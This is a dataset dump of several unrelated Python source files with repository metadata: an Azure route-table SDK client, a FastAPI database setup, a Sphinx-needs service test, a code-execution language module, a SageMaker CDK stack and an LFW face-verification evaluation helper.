'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def _create_or_update_initial(
self, resource_group_name, route_table_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RouteTable')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteTable', response)
if response.status_code == 201:
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, route_table_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or updates a route table in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param parameters: Parameters supplied to the create or update route
table operation.
:type parameters: ~azure.mgmt.network.v2017_11_01.models.RouteTable
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns RouteTable or
ClientRawResponse<RouteTable> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.RouteTable]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.RouteTable]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
route_table_name=route_table_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def _update_tags_initial(
self, resource_group_name, route_table_name, tags=None, custom_headers=None, raw=False, **operation_config):
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_tags(
self, resource_group_name, route_table_name, tags=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a route table tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_table_name: The name of the route table.
:type route_table_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns RouteTable or
ClientRawResponse<RouteTable> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.RouteTable]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.RouteTable]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
route_table_name=route_table_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('RouteTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables/{routeTableName}'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all route tables in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of RouteTable
:rtype:
~azure.mgmt.network.v2017_11_01.models.RouteTablePaged[~azure.mgmt.network.v2017_11_01.models.RouteTable]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RouteTablePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RouteTablePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeTables'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all route tables in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of RouteTable
:rtype:
~azure.mgmt.network.v2017_11_01.models.RouteTablePaged[~azure.mgmt.network.v2017_11_01.models.RouteTable]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RouteTablePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RouteTablePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/routeTables'}
| 46.124521
| 166
| 0.666985
|
06dd7d847c62c64f89bb2eebc7956d42fd7fe066
| 238
|
py
|
Python
|
db.py
|
ahmednafies/fastapi-alembic
|
bffa049aa97872516efda2f883263c3a1e505ec2
|
[
"MIT"
] | 1
|
2021-06-11T10:52:57.000Z
|
2021-06-11T10:52:57.000Z
|
db.py
|
ahmednafies/fastapi-alembic
|
bffa049aa97872516efda2f883263c3a1e505ec2
|
[
"MIT"
] | null | null | null |
db.py
|
ahmednafies/fastapi-alembic
|
bffa049aa97872516efda2f883263c3a1e505ec2
|
[
"MIT"
] | 2
|
2021-06-20T17:08:27.000Z
|
2021-07-16T00:52:50.000Z
|
from fastapi_databases import FastAPIDatabases
import os
from dotenv import load_dotenv
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
load_dotenv(os.path.join(BASE_DIR, ".env"))
db = FastAPIDatabases(os.environ["DATABASE_URL"])
| 26.444444
| 53
| 0.802521
|
2bfacd8bb0c7236c4c995497d65096a3d7d19dc8
| 2,155
|
py
|
Python
|
tests/test_services/test_service_basics.py
|
aris-bb/sphinxcontrib-needs
|
975815c21241fc1f5a58d8cf5504eb76ab95f73f
|
[
"MIT"
] | 1
|
2022-03-24T08:55:28.000Z
|
2022-03-24T08:55:28.000Z
|
tests/test_services/test_service_basics.py
|
aris-bb/sphinxcontrib-needs
|
975815c21241fc1f5a58d8cf5504eb76ab95f73f
|
[
"MIT"
] | null | null | null |
tests/test_services/test_service_basics.py
|
aris-bb/sphinxcontrib-needs
|
975815c21241fc1f5a58d8cf5504eb76ab95f73f
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pytest
from sphinxcontrib.needs.services.base import BaseService
from sphinxcontrib.needs.services.manager import ServiceManager
class TestService(BaseService):
options = ["custom_option", "exists"]
def __init__(self, app, name, config, **kwargs):
self.custom_option = config.get("custom_option", False)
super().__init__()
def request(self, options):
data = [
{
"title": "service_test_title",
"id": "TEST_001",
"exists": options.get("exists", "False"),
"not_exists": options.get("not_exists", "False"),
"custom_option": self.custom_option,
# 'content': 'test_content'
}
]
return data
def debug(self, options):
debug_data = {
"request": {
"url": "http://dummy.company.com/my/service",
"user": "my_user",
},
"answer": {"status_code": 200, "body": {"item_amount": 2, "items": ["item_1", "item_2"]}},
}
return debug_data
class NoDebugService(BaseService):
options = []
def __init__(self, app, name, config, **kwargs):
super().__init__()
def request(self, options):
return []
@pytest.mark.parametrize("test_app", [{"buildername": "html", "srcdir": "doc_test/service_doc"}], indirect=True)
def test_service_creation(test_app):
app = test_app
app.build()
assert isinstance(app.needs_services, ServiceManager)
manager = app.needs_services
service = manager.get("testservice")
assert hasattr(service, "custom_option")
assert service.custom_option
html = Path(app.outdir, "index.html").read_text()
assert "service_test_title" in html
assert "TEST_001" in html
assert "custom_option_True" in html
assert "exists_True" in html
assert "not_exists" not in html
# Debug mode checks
# JS got not executed, so we can not test for generated HTML nodes.
assert "http://dummy.company.com/my/service" in html
assert '"items": ["item_1", "item_2"]' in html
| 26.9375
| 112
| 0.607889
|
f08e256ec8b252c9572fccebd7af70efc403151b
| 62
|
py
|
Python
|
Trial.py
|
ShuhaoZQGG/Python-Very-Beginner-to-Very-Intermediate
|
cfad98b1c1c175761d3a68861438562f7d410cb0
|
[
"MIT"
] | null | null | null |
Trial.py
|
ShuhaoZQGG/Python-Very-Beginner-to-Very-Intermediate
|
cfad98b1c1c175761d3a68861438562f7d410cb0
|
[
"MIT"
] | null | null | null |
Trial.py
|
ShuhaoZQGG/Python-Very-Beginner-to-Very-Intermediate
|
cfad98b1c1c175761d3a68861438562f7d410cb0
|
[
"MIT"
] | null | null | null |
myset = {-124,12,51,32,-1000}
print(myset.pop())
print(myset)
| 15.5
| 29
| 0.66129
|
9e5e3072f3b818019b509416bcca42514e33b707
| 2,851
|
py
|
Python
|
server/languages/python/module/LanguageModuleImp.py
|
adamrehn/language-toolbox
|
f86c39784b2a6952719afdd7c3769a6a6b5f2630
|
[
"MIT"
] | 2
|
2018-12-18T07:53:06.000Z
|
2020-02-28T11:13:21.000Z
|
server/languages/python/module/LanguageModuleImp.py
|
adamrehn/language-toolbox
|
f86c39784b2a6952719afdd7c3769a6a6b5f2630
|
[
"MIT"
] | null | null | null |
server/languages/python/module/LanguageModuleImp.py
|
adamrehn/language-toolbox
|
f86c39784b2a6952719afdd7c3769a6a6b5f2630
|
[
"MIT"
] | null | null | null |
from . import common_pb2 as common_messages
from . import language_pb2 as language_messages
from . import language_pb2_grpc as service
from os import path
from os.path import abspath, dirname, join
from .AstTransformer import AstTransformer
from .Utility import Utility
import ast, json, sys
# Retrieve the enum values for the list of processing capabilities
CAPABILITIES = dict(common_messages.Capabilities.items())
class LanguageModuleImp(service.LanguageModuleServicer):
def __init__(self):
# Read our I/O matching and unit test template code
scriptDir = dirname(abspath(__file__))
dataDir = join(scriptDir, 'data')
self.ioHarness = Utility.readFile(join(dataDir, 'IOMatchingHarness.py'))
self.testHarness = Utility.readFile(join(dataDir, 'UnitTestHarness.py'))
self.testCaseTemplate = Utility.readFile(join(dataDir, 'TestCaseTemplate.py'))
def GetCapabilities(self, request, context):
return common_messages.LanguageCapabilities(
language = 'python',
capabilities = CAPABILITIES['GENERATE_ASTS'] | CAPABILITIES['IO_MATCHING'] | CAPABILITIES['UNIT_TESTING']
)
def GetSandboxDetails(self, request, context):
return language_messages.SandboxDetails(
image = 'adamrehn/language-toolbox-sandbox-python',
command = ['bash', '-c', 'cat > /tmp/temp.py && python3 /tmp/temp.py']
)
def GenerateAst(self, request, context):
parsed = ast.parse(request.source)
transform = AstTransformer()
transformed = transform.visit(parsed)
return common_messages.GenerateAstResponse(ast=json.dumps(transformed))
def CodegenIOCapture(self, request, context):
# Inject the source code and stdin data into our template code
combinedCode = self.ioHarness.replace('$$__USER_CODE__$$', request.source + '\n\n' + request.invocation)
combinedCode = combinedCode.replace('$$__STDIN_DATA__$$', request.stdin.replace("'''", "\\'\\'\\'"))
return language_messages.CodegenIOCaptureResponse(error="", data=combinedCode.encode('utf-8'))
def CodegenUnitTests(self, request, context):
# Iterate over each unit test and generate the source code for its test cases
testCaseCode = ''
for test in request.tests:
testCaseCode += '_______unitTestResultVectors.append({"result": []})\n'
testCaseCode += test.setup + '\n'
for case in test.cases:
testCaseCode += case.setup + '\n'
testCaseCode += self.testCaseTemplate.replace('$$__INVOCATION__$$', '{}({})'.format(test.invocation, ','.join(case.inputs)))
testCaseCode += case.teardown + '\n'
testCaseCode += test.teardown + '\n'
# Inject the generated code into our template code
combinedCode = self.testHarness.replace('$$__USER_CODE__$$', request.source)
combinedCode = combinedCode.replace('$$__TEST_CASE_CODE__$$', testCaseCode)
return language_messages.CodegenUnitTestsResponse(error="", data=combinedCode.encode('utf-8'))
| 42.552239
| 128
| 0.744651
|
51cc019b08ec4ee19a0bdf1b81d018c81dfe4717
| 2,393
|
py
|
Python
|
batch_pipeline/infra/sagemaker_pipeline_stack.py
|
brightsparc/amazon-sagemaker-drift-detection
|
020d34d17ba2c987d2831260b1690dbf96432e6b
|
[
"MIT-0"
] | 1
|
2021-08-31T23:14:35.000Z
|
2021-08-31T23:14:35.000Z
|
batch_pipeline/infra/sagemaker_pipeline_stack.py
|
brightsparc/amazon-sagemaker-drift-detection
|
020d34d17ba2c987d2831260b1690dbf96432e6b
|
[
"MIT-0"
] | null | null | null |
batch_pipeline/infra/sagemaker_pipeline_stack.py
|
brightsparc/amazon-sagemaker-drift-detection
|
020d34d17ba2c987d2831260b1690dbf96432e6b
|
[
"MIT-0"
] | 1
|
2021-08-31T04:16:54.000Z
|
2021-08-31T04:16:54.000Z
|
from aws_cdk import (
core,
aws_cloudwatch as cloudwatch,
aws_iam as iam,
aws_lambda as lambda_,
aws_sagemaker as sagemaker,
)
import logging
from batch_config import DriftConfig
logger = logging.getLogger(__name__)
# Create a SageMaker Pipeline resource with a given pipeline_definition
# see: https://docs.aws.amazon.com/cdk/api/latest/python/aws_cdk.aws_sagemaker/CfnPipeline.html
class SageMakerPipelineStack(core.Stack):
def __init__(
self,
scope: core.Construct,
construct_id: str,
pipeline_name: str,
pipeline_description: str,
pipeline_definition_bucket: str,
pipeline_definition_key: str,
sagemaker_role_arn: str,
tags: list,
drift_config: DriftConfig,
**kwargs,
) -> None:
super().__init__(scope, construct_id, **kwargs)
sagemaker.CfnPipeline(
self,
"Pipeline",
pipeline_name=pipeline_name,
pipeline_description=pipeline_description,
pipeline_definition={
"PipelineDefinitionS3Location": {
"Bucket": pipeline_definition_bucket,
"Key": pipeline_definition_key,
}
},
role_arn=sagemaker_role_arn,
tags=tags,
)
if drift_config is not None:
# Create a CW alarm (which will be picked up by build pipeline)
alarm_name = f"sagemaker-{pipeline_name}-threshold"
cloudwatch.CfnAlarm(
self,
"DriftAlarm",
alarm_name=alarm_name,
alarm_description=f"Batch Drift Threshold",
metric_name=drift_config.metric_name,
threshold=drift_config.metric_threshold,
namespace="aws/sagemaker/ModelBuildingPipeline/data-metrics",
comparison_operator=drift_config.comparison_operator,
dimensions=[
cloudwatch.CfnAlarm.DimensionProperty(
name="PipelineName", value=pipeline_name
),
],
evaluation_periods=drift_config.evaluation_periods,
period=drift_config.period,
datapoints_to_alarm=drift_config.datapoints_to_alarm,
statistic=drift_config.statistic,
)
| 33.704225
| 95
| 0.600084
|
68d4da14187bb08c949fb547323380162eb2141e
| 12,181
|
py
|
Python
|
src/eval/lfw.py
|
longchr123/insightface-analysis
|
c6c0313e880497c037b55182297954e7c0a8c101
|
[
"MIT"
] | null | null | null |
src/eval/lfw.py
|
longchr123/insightface-analysis
|
c6c0313e880497c037b55182297954e7c0a8c101
|
[
"MIT"
] | null | null | null |
src/eval/lfw.py
|
longchr123/insightface-analysis
|
c6c0313e880497c037b55182297954e7c0a8c101
|
[
"MIT"
] | null | null | null |
"""Helper for evaluation on the Labeled Faces in the Wild dataset
"""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from scipy import misc
from sklearn.model_selection import KFold
from scipy import interpolate
import sklearn
from sklearn.decomposition import PCA
import mxnet as mx
from mxnet import ndarray as nd
def calculate_roc(thresholds, embeddings1, embeddings2, actual_issame, nrof_folds=10, pca=0):
assert (embeddings1.shape[0] == embeddings2.shape[0])
assert (embeddings1.shape[1] == embeddings2.shape[1])
nrof_pairs = min(len(actual_issame), embeddings1.shape[0])
nrof_thresholds = len(thresholds)
k_fold = KFold(n_splits=nrof_folds, shuffle=False)
tprs = np.zeros((nrof_folds, nrof_thresholds))
fprs = np.zeros((nrof_folds, nrof_thresholds))
accuracy = np.zeros((nrof_folds))
indices = np.arange(nrof_pairs)
# print('pca', pca)
if pca == 0:
diff = np.subtract(embeddings1, embeddings2)
dist = np.sum(np.square(diff), 1)
for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):
# print('train_set', train_set)
# print('test_set', test_set)
if pca > 0:
print('doing pca on', fold_idx)
embed1_train = embeddings1[train_set]
embed2_train = embeddings2[train_set]
_embed_train = np.concatenate((embed1_train, embed2_train), axis=0)
# print(_embed_train.shape)
pca_model = PCA(n_components=pca)
pca_model.fit(_embed_train)
embed1 = pca_model.transform(embeddings1)
embed2 = pca_model.transform(embeddings2)
embed1 = sklearn.preprocessing.normalize(embed1)
embed2 = sklearn.preprocessing.normalize(embed2)
# print(embed1.shape, embed2.shape)
diff = np.subtract(embed1, embed2)
dist = np.sum(np.square(diff), 1)
# Find the best threshold for the fold
acc_train = np.zeros((nrof_thresholds))
for threshold_idx, threshold in enumerate(thresholds):
_, _, acc_train[threshold_idx] = calculate_accuracy(threshold, dist[train_set], actual_issame[train_set])
best_threshold_index = np.argmax(acc_train)
for threshold_idx, threshold in enumerate(thresholds):
tprs[fold_idx, threshold_idx], fprs[fold_idx, threshold_idx], _ = calculate_accuracy(threshold,
dist[test_set],
actual_issame[
test_set])
_, _, accuracy[fold_idx] = calculate_accuracy(thresholds[best_threshold_index], dist[test_set],
actual_issame[test_set])
tpr = np.mean(tprs, 0)
fpr = np.mean(fprs, 0)
return tpr, fpr, accuracy
def calculate_accuracy(threshold, dist, actual_issame):
predict_issame = np.less(dist, threshold)
tp = np.sum(np.logical_and(predict_issame, actual_issame))
fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))
tn = np.sum(np.logical_and(np.logical_not(predict_issame), np.logical_not(actual_issame)))
fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issame))
tpr = 0 if (tp + fn == 0) else float(tp) / float(tp + fn)
fpr = 0 if (fp + tn == 0) else float(fp) / float(fp + tn)
acc = float(tp + tn) / dist.size
return tpr, fpr, acc
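# Editor's note (illustrative, not part of the original file): calculate_accuracy
# implements the usual definitions
#     TPR = TP / (TP + FN),  FPR = FP / (FP + TN),  ACC = (TP + TN) / N
# e.g. with TP=40, FN=10, FP=5, TN=45 (N=100): TPR=0.8, FPR=0.1, ACC=0.85.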
def calculate_val(thresholds, embeddings1, embeddings2, actual_issame, far_target, nrof_folds=10):
assert (embeddings1.shape[0] == embeddings2.shape[0])
assert (embeddings1.shape[1] == embeddings2.shape[1])
nrof_pairs = min(len(actual_issame), embeddings1.shape[0])
nrof_thresholds = len(thresholds)
k_fold = KFold(n_splits=nrof_folds, shuffle=False)
val = np.zeros(nrof_folds)
far = np.zeros(nrof_folds)
diff = np.subtract(embeddings1, embeddings2)
dist = np.sum(np.square(diff), 1)
indices = np.arange(nrof_pairs)
for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):
# Find the threshold that gives FAR = far_target
far_train = np.zeros(nrof_thresholds)
for threshold_idx, threshold in enumerate(thresholds):
_, far_train[threshold_idx] = calculate_val_far(threshold, dist[train_set], actual_issame[train_set])
if np.max(far_train) >= far_target:
f = interpolate.interp1d(far_train, thresholds, kind='slinear')
threshold = f(far_target)
else:
threshold = 0.0
val[fold_idx], far[fold_idx] = calculate_val_far(threshold, dist[test_set], actual_issame[test_set])
val_mean = np.mean(val)
far_mean = np.mean(far)
val_std = np.std(val)
return val_mean, val_std, far_mean
def calculate_val_far(threshold, dist, actual_issame):
predict_issame = np.less(dist, threshold)
true_accept = np.sum(np.logical_and(predict_issame, actual_issame))
false_accept = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))
n_same = np.sum(actual_issame)
n_diff = np.sum(np.logical_not(actual_issame))
val = float(true_accept) / float(n_same)
far = float(false_accept) / float(n_diff)
return val, far
def evaluate(embeddings, actual_issame, nrof_folds=10, pca=0):
# Calculate evaluation metrics
thresholds = np.arange(0, 4, 0.01)
embeddings1 = embeddings[0::2]
embeddings2 = embeddings[1::2]
tpr, fpr, accuracy = calculate_roc(thresholds, embeddings1, embeddings2,
np.asarray(actual_issame), nrof_folds=nrof_folds, pca=pca)
thresholds = np.arange(0, 4, 0.001)
val, val_std, far = calculate_val(thresholds, embeddings1, embeddings2,
np.asarray(actual_issame), 1e-3, nrof_folds=nrof_folds)
return tpr, fpr, accuracy, val, val_std, far
def get_paths(lfw_dir, pairs, file_ext):
"""pairs中,Andrea_Bowen 43 13 表示同一个人,Alley_Mills 31 Bobbie_Eakes 34 表示不同人"""
nrof_skipped_pairs = 0
path_list = []
issame_list = []
for pair in pairs:
if len(pair) == 3:
path0 = os.path.join(lfw_dir, pair[0], pair[0] + '_' + '%04d' % int(pair[1]) + '.' + file_ext)
path1 = os.path.join(lfw_dir, pair[0], pair[0] + '_' + '%04d' % int(pair[2]) + '.' + file_ext)
issame = True
elif len(pair) == 4:
path0 = os.path.join(lfw_dir, pair[0], pair[0] + '_' + '%04d' % int(pair[1]) + '.' + file_ext)
path1 = os.path.join(lfw_dir, pair[2], pair[2] + '_' + '%04d' % int(pair[3]) + '.' + file_ext)
issame = False
if os.path.exists(path0) and os.path.exists(path1): # Only add the pair if both paths exist
            # Append both paths; path_list stays a flat (one-dimensional) list
path_list += (path0, path1)
issame_list.append(issame)
else:
print('not exists', path0, path1)
nrof_skipped_pairs += 1
if nrof_skipped_pairs > 0:
print('Skipped %d image pairs' % nrof_skipped_pairs)
return path_list, issame_list
def read_pairs(pairs_filename):
pairs = []
with open(pairs_filename, 'r') as f:
for line in f.readlines()[1:]:
pair = line.strip().split()
pairs.append(pair)
return np.array(pairs)
def load_dataset(lfw_dir, image_size):
lfw_pairs = read_pairs(os.path.join(lfw_dir, 'pairs.txt'))
lfw_paths, issame_list = get_paths(lfw_dir, lfw_pairs, 'jpg')
lfw_data_list = []
for flip in [0, 1]:
lfw_data = nd.empty((len(lfw_paths), 3, image_size[0], image_size[1]))
lfw_data_list.append(lfw_data)
i = 0
for path in lfw_paths:
with open(path, 'rb') as fin:
_bin = fin.read()
img = mx.image.imdecode(_bin)
img = nd.transpose(img, axes=(2, 0, 1))
for flip in [0, 1]:
if flip == 1:
img = mx.ndarray.flip(data=img, axis=2)
lfw_data_list[flip][i][:] = img
i += 1
if i % 1000 == 0:
print('loading lfw', i)
print(lfw_data_list[0].shape)
print(lfw_data_list[1].shape)
return (lfw_data_list, issame_list)
def test(lfw_set, mx_model, batch_size):
print('testing lfw..')
lfw_data_list = lfw_set[0]
issame_list = lfw_set[1]
model = mx_model
embeddings_list = []
for i in range(len(lfw_data_list)):
lfw_data = lfw_data_list[i]
embeddings = None
ba = 0
while ba < lfw_data.shape[0]:
bb = min(ba + batch_size, lfw_data.shape[0])
_data = nd.slice_axis(lfw_data, axis=0, begin=ba, end=bb)
_label = nd.ones((bb - ba,))
# print(_data.shape, _label.shape)
db = mx.io.DataBatch(data=(_data,), label=(_label,))
model.forward(db, is_train=False)
net_out = model.get_outputs()
# _arg, _aux = model.get_params()
# __arg = {}
# for k,v in _arg.iteritems():
# __arg[k] = v.as_in_context(_ctx)
# _arg = __arg
# _arg["data"] = _data.as_in_context(_ctx)
